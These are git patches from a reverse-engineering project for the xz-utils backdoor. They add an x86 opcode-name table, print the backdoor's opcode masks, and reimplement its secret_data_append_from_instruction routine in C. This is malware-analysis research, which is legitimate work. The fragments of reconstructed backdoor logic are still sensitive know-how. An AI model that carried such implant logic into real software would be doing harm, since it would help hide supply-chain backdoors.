x86_opcode_names.c diff --git a/CMakeLists.txt b/CMakeLists.txt index 7c33148..a8921d8 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -46,6 +46,7 @@ endif() set(SOURCES ${CMAKE_SOURCE_DIR}/liblzma_la-crc64-fast.o + x86_opcode_names.c xzre.c xzre.S util.c diff --git a/x86_opcode_names.c b/x86_opcode_names.c new file mode 100644 index 0000000..f638571 --- /dev/null +++ b/x86_opcode_names.c @@ -0,0 +1,268 @@ +/* + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +/** +Source: https://github.com/torvalds/linux/blob/690ca3a3067f760bef92ca5db1c42490498ab5de/arch/x86/lib/x86-opcode-map.txt +*/ +const char *X86_OPCODE_NAMES[] = { +"ADD Eb,Gb", +"ADD Ev,Gv", +"ADD Gb,Eb", +"ADD Gv,Ev", +"ADD AL,Ib", +"ADD rAX,Iz", +"PUSH ES (i64)", +"POP ES (i64)", +"OR Eb,Gb", +"OR Ev,Gv", +"OR Gb,Eb", +"OR Gv,Ev", +"OR AL,Ib", +"OR rAX,Iz", +"PUSH CS (i64)", +"escape", // 2-byte escape +"ADC Eb,Gb", +"ADC Ev,Gv", +"ADC Gb,Eb", +"ADC Gv,Ev", +"ADC AL,Ib", +"ADC rAX,Iz", +"PUSH SS (i64)", +"POP SS (i64)", +"SBB Eb,Gb", +"SBB Ev,Gv", +"SBB Gb,Eb", +"SBB Gv,Ev", +"SBB AL,Ib", +"SBB rAX,Iz", +"PUSH DS (i64)", +"POP DS (i64)", +"AND Eb,Gb", +"AND Ev,Gv", +"AND Gb,Eb", +"AND Gv,Ev", +"AND AL,Ib", +"AND rAx,Iz", +"SEG=ES (Prefix)", +"DAA (i64)", +"SUB Eb,Gb", +"SUB Ev,Gv", +"SUB Gb,Eb", +"SUB Gv,Ev", +"SUB AL,Ib", +"SUB rAX,Iz", +"SEG=CS (Prefix)", +"DAS (i64)", +"XOR Eb,Gb", +"XOR Ev,Gv", +"XOR Gb,Eb", +"XOR Gv,Ev", +"XOR AL,Ib", +"XOR rAX,Iz", +"SEG=SS (Prefix)", +"AAA (i64)", +"CMP Eb,Gb", +"CMP Ev,Gv", +"CMP Gb,Eb", +"CMP Gv,Ev", +"CMP AL,Ib", +"CMP rAX,Iz", +"SEG=DS (Prefix)", +"AAS (i64)", +"INC eAX (i64) | REX (o64)", +"INC eCX (i64) | REX.B (o64)", +"INC eDX (i64) | REX.X (o64)", +"INC eBX (i64) | REX.XB (o64)", +"INC eSP (i64) | REX.R (o64)", +"INC eBP (i64) | REX.RB (o64)", +"INC eSI (i64) | REX.RX (o64)", +"INC eDI (i64) | REX.RXB (o64)", +"DEC eAX (i64) | REX.W (o64)", +"DEC eCX (i64) | REX.WB (o64)", +"DEC eDX (i64) | REX.WX (o64)", +"DEC eBX (i64) | REX.WXB (o64)", +"DEC eSP (i64) | REX.WR (o64)", +"DEC eBP (i64) | REX.WRB (o64)", +"DEC eSI (i64) | REX.WRX (o64)", +"DEC eDI (i64) | REX.WRXB (o64)", +"PUSH rAX/r8 (d64)", +"PUSH rCX/r9 (d64)", +"PUSH rDX/r10 (d64)", +"PUSH rBX/r11 (d64)", +"PUSH rSP/r12 (d64)", +"PUSH rBP/r13 (d64)", +"PUSH rSI/r14 (d64)", +"PUSH rDI/r15 (d64)", +"POP rAX/r8 (d64)", +"POP rCX/r9 (d64)", +"POP rDX/r10 (d64)", +"POP rBX/r11 (d64)", +"POP rSP/r12 (d64)", +"POP rBP/r13 (d64)", +"POP rSI/r14 (d64)", +"POP rDI/r15 (d64)", +"PUSHA/PUSHAD (i64)", +"POPA/POPAD (i64)", +"BOUND Gv,Ma (i64) | EVEX (Prefix)", +"ARPL Ew,Gw (i64) | MOVSXD Gv,Ev (o64)", +"SEG=FS (Prefix)", +"SEG=GS (Prefix)", +"Operand-Size (Prefix)", +"Address-Size (Prefix)", +"PUSH Iz", +"IMUL Gv,Ev,Iz", +"PUSH Ib (d64)", +"IMUL Gv,Ev,Ib", +"INS/INSB Yb,DX", +"INS/INSW/INSD Yz,DX", +"OUTS/OUTSB DX,Xb", +"OUTS/OUTSW/OUTSD DX,Xz", +"JO Jb (!REX2)", +"JNO Jb (!REX2)", +"JB/JNAE/JC Jb (!REX2)", +"JNB/JAE/JNC Jb (!REX2)", +"JZ/JE Jb (!REX2)", +"JNZ/JNE Jb (!REX2)", +"JBE/JNA Jb (!REX2)", +"JNBE/JA Jb (!REX2)", +"JS Jb (!REX2)", +"JNS Jb (!REX2)", +"JP/JPE Jb (!REX2)", +"JNP/JPO Jb (!REX2)", +"JL/JNGE Jb (!REX2)", +"JNL/JGE Jb (!REX2)", +"JLE/JNG Jb (!REX2)", +"JNLE/JG Jb (!REX2)", +"Grp1 Eb,Ib (1A)", +"Grp1 Ev,Iz (1A)", +"Grp1 Eb,Ib (1A),(i64)", +"Grp1 Ev,Ib (1A)", +"TEST Eb,Gb", +"TEST Ev,Gv", +"XCHG Eb,Gb", +"XCHG Ev,Gv", +"MOV Eb,Gb", +"MOV Ev,Gv", +"MOV Gb,Eb", +"MOV Gv,Ev", +"MOV Ev,Sw", +"LEA Gv,M", +"MOV Sw,Ew", +"Grp1A (1A) | POP Ev (d64)", +"NOP | PAUSE (F3) | XCHG r8,rAX", +"XCHG rCX/r9,rAX", +"XCHG rDX/r10,rAX", +"XCHG rBX/r11,rAX", +"XCHG rSP/r12,rAX", +"XCHG rBP/r13,rAX", +"XCHG rSI/r14,rAX", +"XCHG rDI/r15,rAX", +"CBW/CWDE/CDQE", +"CWD/CDQ/CQO", +"CALLF Ap (i64)", +"FWAIT/WAIT", +"PUSHF/D/Q Fv (d64)", +"POPF/D/Q Fv (d64)", +"SAHF", +"LAHF", +"MOV AL,Ob (!REX2)", +"MOV rAX,Ov (!REX2) | JMPABS O (REX2),(o64)", +"MOV Ob,AL (!REX2)", +"MOV Ov,rAX (!REX2)", +"MOVS/B Yb,Xb (!REX2)", +"MOVS/W/D/Q Yv,Xv (!REX2)", +"CMPS/B Xb,Yb (!REX2)", +"CMPS/W/D Xv,Yv (!REX2)", +"TEST AL,Ib (!REX2)", +"TEST rAX,Iz (!REX2)", +"STOS/B Yb,AL (!REX2)", +"STOS/W/D/Q Yv,rAX (!REX2)", +"LODS/B AL,Xb (!REX2)", +"LODS/W/D/Q rAX,Xv (!REX2)", +"SCAS/B AL,Yb (!REX2)", +"SCAS/W/D/Q rAX,Yv (!REX2)", +"MOV AL/R8L,Ib", +"MOV CL/R9L,Ib", +"MOV DL/R10L,Ib", +"MOV BL/R11L,Ib", +"MOV AH/R12L,Ib", +"MOV CH/R13L,Ib", +"MOV DH/R14L,Ib", +"MOV BH/R15L,Ib", +"MOV rAX/r8,Iv", +"MOV rCX/r9,Iv", +"MOV rDX/r10,Iv", +"MOV rBX/r11,Iv", +"MOV rSP/r12,Iv", +"MOV rBP/r13,Iv", +"MOV rSI/r14,Iv", +"MOV rDI/r15,Iv", +"Grp2 Eb,Ib (1A)", +"Grp2 Ev,Ib (1A)", +"RETN Iw (f64)", +"RETN", +"LES Gz,Mp (i64) | VEX+2byte (Prefix)", +"LDS Gz,Mp (i64) | VEX+1byte (Prefix)", +"Grp11A Eb,Ib (1A)", +"Grp11B Ev,Iz (1A)", +"ENTER Iw,Ib", +"LEAVE (d64)", +"RETF Iw", +"RETF", +"INT3", +"INT Ib", +"INTO (i64)", +"IRET/D/Q", +"Grp2 Eb,1 (1A)", +"Grp2 Ev,1 (1A)", +"Grp2 Eb,CL (1A)", +"Grp2 Ev,CL (1A)", +"AAM Ib (i64)", +"AAD Ib (i64) | REX2 (Prefix),(o64)", +"", +"XLAT/XLATB", +"ESC", +"ESC", +"ESC", +"ESC", +"ESC", +"ESC", +"ESC", +"ESC", +"LOOPNE/LOOPNZ Jb (f64) (!REX2)", +"LOOPE/LOOPZ Jb (f64) (!REX2)", +"LOOP Jb (f64) (!REX2)", +"JrCXZ Jb (f64) (!REX2)", +"IN AL,Ib (!REX2)", +"IN eAX,Ib (!REX2)", +"OUT Ib,AL (!REX2)", +"OUT Ib,eAX (!REX2)", +"CALL Jz (f64) (!REX2)", +"JMP-near Jz (f64) (!REX2)", +"JMP-far Ap (i64) (!REX2)", +"JMP-short Jb (f64) (!REX2)", +"IN AL,DX (!REX2)", +"IN eAX,DX (!REX2)", +"OUT DX,AL (!REX2)", +"OUT DX,eAX (!REX2)", +"LOCK (Prefix)", +"", +"REPNE (Prefix) | XACQUIRE (Prefix)", +"REP/REPE (Prefix) | XRELEASE (Prefix)", +"HLT", +"CMC", +"Grp3_1 Eb (1A)", +"Grp3_2 Ev (1A)", +"CLC", +"STC", +"CLI", +"STI", +"CLD", +"STD", +"Grp4 (1A)", +"Grp5 (1A)" +}; + +const int X86_OPCODE_NAMES_COUNT = ARRAY_SIZE(X86_OPCODE_NAMES); diff --git a/xzre.c b/xzre.c index 364a22a..bc0c147 100644 --- a/xzre.c +++ b/xzre.c @@ -16,6 +16,9 @@ #include #endif +extern const char *X86_OPCODE_NAMES[]; +extern const int X86_OPCODE_NAMES_COUNT; + const char *StringXrefName[] = { "XREF_xcalloc_zero_size", "XREF_Could_not_chdir_to_home_directory_s_s", @@ -338,8 +341,32 @@ void main_shared(){ } +void print_opcode_mask(u64 mask, int mask_offset){ + for(unsigned i=0x80 + mask_offset; mask; mask >>= 1, i++){ + // bit 1: this opcode is forbidden + BOOL allowed = (mask & 1) == 0; + printf("%s 0x%"PRIX8" (0x%"PRIX8") -> %s\n", + (allowed) ? "+" : "-", + (u8)i, XZDASM_OPC(i), + XZDASM_OPC(i) < X86_OPCODE_NAMES_COUNT + ? X86_OPCODE_NAMES[XZDASM_OPC(i)] + : "?" + ); + } +} + +void print_opcode_masks(){ + puts("find_reg2reg_instruction instruction mask"); + print_opcode_mask(0x505050500000505, 1); + puts("secret_data_append_from_instruction mask"); + print_opcode_mask(0x410100000101, 3); +} + int main(int argc, char *argv[]){ puts("xzre 0.1 by Smx :)"); + + print_opcode_masks(); + dasm_ctx_t ctx = {0}; u8 *start = (u8 *)&dasm_sample; for(int i=0;; start += ctx.instruction_size, i++){ diff --git a/xzre.h b/xzre.h index 5ceaf41..b1e411b 100644 --- a/xzre.h +++ b/xzre.h @@ -299,11 +299,13 @@ typedef struct { #define X_BN_num_bytes(bits) (((bits)+7)/8) // opcode is always +0x80 for the sake of it (yet another obfuscation) -#define XZDASM_OPC(op) (op - 0x80) +#define XZDASM_OPC(op) ((u8)(op) - 0x80) enum X86_OPCODE { X86_OPCODE_LEA = 0x8D, X86_OPCODE_CALL = 0xE8, + // MOV r/m16/32/64 r16/32/64 + X86_OPCODE_MOV = 0x89, // MOV r16/32/64 r/m16/32/64 X86_OPCODE_MOV_LOAD = 0x8B, // MOV m16 Sreg Move From ad60dad0be5a9bcfaa78861c5bbe6dcfbc19e435 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 23:45:55 +0200 Subject: [PATCH 14/15] xzre_code: add secret_data_append_from_instruction --- xzre.h | 5 +++++ xzre_code/CMakeLists.txt | 1 + xzre_code/secret_data_append_from_instruction.c | 16 ++++++++++++++++ 3 files changed, 22 insertions(+) create mode 100644 xzre_code/secret_data_append_from_instruction.c diff --git a/xzre.h b/xzre.h index b1e411b..2271aad 100644 --- a/xzre.h +++ b/xzre.h @@ -304,6 +304,8 @@ typedef struct { enum X86_OPCODE { X86_OPCODE_LEA = 0x8D, X86_OPCODE_CALL = 0xE8, + // CMP r16/32/64 r/m16/32/64 + X86_OPCODE_CMP = 0x3B, // MOV r/m16/32/64 r16/32/64 X86_OPCODE_MOV = 0x89, // MOV r16/32/64 r/m16/32/64 @@ -313,6 +315,9 @@ enum X86_OPCODE { X86_OPCODE_MOV_STORE = 0x8C }; +#define XZDASM_TEST_MASK(mask, offset, opcode) \ + (((mask >> ((u8)(XZDASM_OPC(opcode) + offset))) & 1) == 1) + enum X86_REG { X86_REG_RBP = 5 }; diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 8c72c21..4d47cdf 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -19,6 +19,7 @@ add_library(xzre_code rsa_key_hash.c run_backdoor_commands.c secret_data_append_from_address.c + secret_data_append_from_instruction.c secret_data_append_item.c secret_data_append_singleton.c secret_data_get_decrypted.c diff --git a/xzre_code/secret_data_append_from_instruction.c b/xzre_code/secret_data_append_from_instruction.c new file mode 100644 index 0000000..81b89c3 --- /dev/null +++ b/xzre_code/secret_data_append_from_instruction.c @@ -0,0 +1,16 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL secret_data_append_from_instruction(dasm_ctx_t *dctx, secret_data_shift_cursor_t *cursor){ + if(cursor->index <= 0x1C7 + && XZDASM_OPC(dctx->opcode) != X86_OPCODE_MOV + && XZDASM_OPC(dctx->opcode) != X86_OPCODE_CMP + && !XZDASM_TEST_MASK(0x410100000101, 3, dctx->opcode) + ){ + global_ctx->secret_data[cursor->byte_index] |= 1 << (cursor->bit_index); + } + ++cursor->index; + return TRUE; +} From 660526cbe1f12e088bec2cb78923a35c159342cc Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 23:47:13 +0200 Subject: [PATCH 15/15] run_backdoor_commands: add warning/note about code correctness --- xzre_code/run_backdoor_commands.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/xzre_code/run_backdoor_commands.c b/xzre_code/run_backdoor_commands.c index 12c5429..1a41d25 100644 --- a/xzre_code/run_backdoor_commands.c +++ b/xzre_code/run_backdoor_commands.c @@ -1,3 +1,5 @@ +#warning "this function is WIP / needs validation" + /** * Copyright (C) 2024 Stefano Moioli **/